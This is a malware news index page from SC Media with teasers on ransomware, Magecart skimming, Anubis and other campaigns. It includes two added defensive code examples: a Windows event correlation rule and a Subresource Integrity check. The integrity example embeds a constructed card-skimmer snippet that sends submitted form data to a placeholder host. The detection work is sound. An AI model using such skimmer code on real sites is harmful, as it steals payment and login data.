Malware | SC Media

Malware

Downloads of cracked software distribute ransomware via adware bundles

Websites offering cracked versions of popular software programs have recently been serving up adware bundles that secretly deliver a variant of STOP ransomware. According to a pair of reports from Bleeping Computer founder Lawrence Abrams, the scheme came to light in December 2018 with the appearance of the malicious encryptor “Djvu” – so named because…

Abuse.ch takes down 100K malware distribution sites in 10 months

Swiss non-profit threat-sharing platform Abuse.ch announced it has managed to take down 100,000 malware distribution sites in 10 months through a project built around sharing the malicious URLs used for distribution. Abuse.ch’s URLhaus project was launched last year to collect malicious URLs, allowing anyone to sign up with a Twitter account to report…

Researchers find Telegram bot chatter is actually Windows malware commands

Decrypted Telegram bot chatter turned out to be the command traffic of a new piece of Windows malware, dubbed GoodSender, which uses the messaging platform to listen for and receive commands. Forcepoint researchers discovered what they described as a “fairly simple” year-old malware that, once it infects a victim’s device, creates a new administrator account and enables remote desktop.…
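The post-infection behaviour described above (a fresh local account that is promptly made an administrator while Remote Desktop is switched on) is a pattern a detection engineer can correlate from host telemetry. The following is an added example, not code from the article or from Forcepoint: a small correlation rule over Windows event records. The event IDs are the real ones (Security 4720 = user account created, Security 4732 = member added to a security-enabled local group, Sysmon 13 = registry value set) and the registry value is the one Windows consults for RDP; the event dicts, field names and account names are constructed sample data with simplified fields, not real logs.

```python
"""Correlation rule for the GoodSender-style post-infection pattern:
a new local account is created, added to Administrators, and Remote Desktop
is switched on shortly afterwards. The event dicts below are constructed
sample data with simplified field names, not real telemetry."""
from datetime import datetime, timedelta

# Registry value Windows checks for Remote Desktop; 0 means RDP is allowed.
RDP_DENY_VALUE = (r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
                  r"\fDenyTSConnections")

# Constructed sample events: one malicious sequence, one benign helpdesk action.
SAMPLE_EVENTS = [
    {"time": "2019-01-15T10:00:01", "source": "Security", "id": 4720,
     "target": "svc_update", "subject": "WIN10\\alice"},
    {"time": "2019-01-15T10:00:02", "source": "Security", "id": 4732,
     "target": "svc_update", "group": "Administrators",
     "subject": "WIN10\\alice"},
    {"time": "2019-01-15T10:00:03", "source": "Sysmon", "id": 13,
     "key": RDP_DENY_VALUE, "details": "DWORD (0x00000000)",
     "image": r"C:\Users\alice\AppData\Roaming\update.exe"},
    {"time": "2019-01-15T14:30:00", "source": "Security", "id": 4720,
     "target": "jsmith", "subject": "WIN10\\helpdesk"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def correlate(events, window=timedelta(minutes=10)):
    """Return one alert per account creation that is followed, within
    `window`, by that same account joining Administrators. The alert is
    raised to high severity if RDP was also enabled inside the window."""
    creations = [e for e in events
                 if e["source"] == "Security" and e["id"] == 4720]
    admin_adds = [e for e in events
                  if e["source"] == "Security" and e["id"] == 4732
                  and e.get("group") == "Administrators"]
    rdp_enables = [e for e in events
                   if e["source"] == "Sysmon" and e["id"] == 13
                   and e.get("key") == RDP_DENY_VALUE
                   and e.get("details", "").endswith("(0x00000000)")]

    alerts = []
    for created in creations:
        start, end = _ts(created), _ts(created) + window

        def in_window(e):
            return start <= _ts(e) <= end

        became_admin = any(e["target"] == created["target"] and in_window(e)
                           for e in admin_adds)
        if not became_admin:
            continue  # a plain account creation on its own is routine admin work
        rdp = [e for e in rdp_enables if in_window(e)]
        alerts.append({
            "account": created["target"],
            "created_by": created["subject"],
            "rdp_enabled": bool(rdp),
            "rdp_writer": rdp[0]["image"] if rdp else None,
            "severity": "high" if rdp else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The rule deliberately ignores a lone 4720: helpdesk staff create accounts all day, and what separates the malware from routine work is the privilege grant and the RDP change landing within minutes of each other. The `rdp_writer` field carries the process that wrote the registry value, which is usually the fastest pivot to the implant itself.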

Google Play boots fake apps that spy on devices’ motion sensor data before dropping Anubis malware

A fake currency converter and a phony battery utility program are among the latest fraudulent apps to be expunged from Google Play, according to researchers who discovered they were infecting users with a version of the Anubis banking malware family. Both fraudulent apps employ a crafty technique to determine whether it is safe for them…

GandCrab returns with trojans and redundancy

The GandCrab ransomware has returned with a new set of trojans bundled alongside its initial infection. The addition of new tools comes just over a week after at least one threat actor began pairing the info stealer Vidar with the ransomware to increase their odds of taking something of value away from…

New Magecart group using new tactics hits French ad firm

Researchers at Trend Micro and RiskIQ have pulled back the curtain on a new Magecart sub-group that managed to insert card-skimmer code into the sites of more than 200 companies by using a third-party vendor as an unwitting accomplice. The new malicious team, tagged Magecart Group 12, managed to inject their malware into the JavaScript library of…
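Because the skimmer rode in on a script the victims loaded from a vendor, the check that would have caught it is Subresource Integrity: pin the hash of the reviewed library and let the browser refuse any copy whose bytes differ. The following is an added example, not code from the article or from either research team; the two script bodies are constructed stand-ins for a clean library and a tampered one, and the hostnames are placeholders.

```python
"""Subresource Integrity pinning for a third-party script. The script bodies
are constructed stand-ins, not the library or skimmer from the incident."""
import base64
import hashlib

# Constructed: the vendor library as reviewed and pinned.
CLEAN_LIBRARY = b"(function(){window.adTag=function(id){return id;};})();\n"

# Constructed: the same library with a form-scraping payload appended,
# the shape of change a skimmer injection produces.
TAMPERED_LIBRARY = CLEAN_LIBRARY + (
    b"document.addEventListener('submit',function(e){"
    b"new Image().src='https://example.invalid/c?d='+"
    b"encodeURIComponent(new URLSearchParams(new FormData(e.target)))});\n")


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Return the value for a <script integrity=...> attribute: algorithm
    name, a dash, then the base64 digest, as browsers expect it."""
    if algorithm not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify(content: bytes, integrity: str) -> bool:
    """True only if the bytes hash to the pinned integrity value; an
    unsupported or malformed pin fails closed."""
    algorithm = integrity.partition("-")[0]
    try:
        return sri_hash(content, algorithm) == integrity
    except ValueError:
        return False


def script_tag(src: str, content: bytes) -> str:
    """HTML that makes the browser enforce the pin. crossorigin="anonymous"
    is required for SRI to apply to a cross-origin script."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    pinned = sri_hash(CLEAN_LIBRARY)
    print(script_tag("https://cdn.example.invalid/adtag.js", CLEAN_LIBRARY))
    print("clean copy accepted:", verify(CLEAN_LIBRARY, pinned))
    print("tampered copy accepted:", verify(TAMPERED_LIBRARY, pinned))
```

The caveat a practitioner needs: SRI only works when the vendor serves a fixed, versioned file. If the URL serves a rolling build, the pin will block legitimate updates as well as malicious ones, so pair it with a job that periodically re-fetches what the vendor serves, recomputes `sri_hash`, and alerts a human before the pin is updated. It also does nothing for skimmer code spliced into first-party scripts, which needs change monitoring on your own deploys.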

Rocke malware disables cloud security before mining cryptocurrency

A new Linux cryptocurrency mining malware used by the Rocke group can evade detection by cloud security products by disabling them. Palo Alto Networks’ Unit 42 researchers spotted what appears to be the first malware family that can target and remove cloud security products, according to a blog post. “Public cloud infrastructure is one of the…

Del Rio, Texas ransomware attack knocks city offline

Another city was hit with a ransomware attack that knocked daily services back into the era of pen and pad. Last week, the city of Del Rio, Texas, was hit with a ransomware attack that forced city officials to shut down the servers at its city hall and deny employees access to the system,…

Fake movie file injects malicious content into high-profile sites

A malicious Windows shortcut file disguised as a movie on The Pirate Bay torrent tracker is capable of injecting attacker-controlled content into high-profile websites as well as stealing cryptocurrency. A security researcher who goes by the Twitter handle 0xffff0800 discovered the malware masquerading as a video file for the movie “The…

Ryuk ransomware linked to Emotet and TrickBot trojans; suspicions shift to cybercriminal group

Multiple researchers are linking the Ryuk ransomware that disrupted the operations of multiple U.S. newspapers in late 2018 to the Emotet and TrickBot trojans. In doing so, some analysts have also shifted blame for the attack from North Korean actors to cybercriminals, possibly from Russia, while others maintain that attribution efforts are premature. CrowdStrike,…
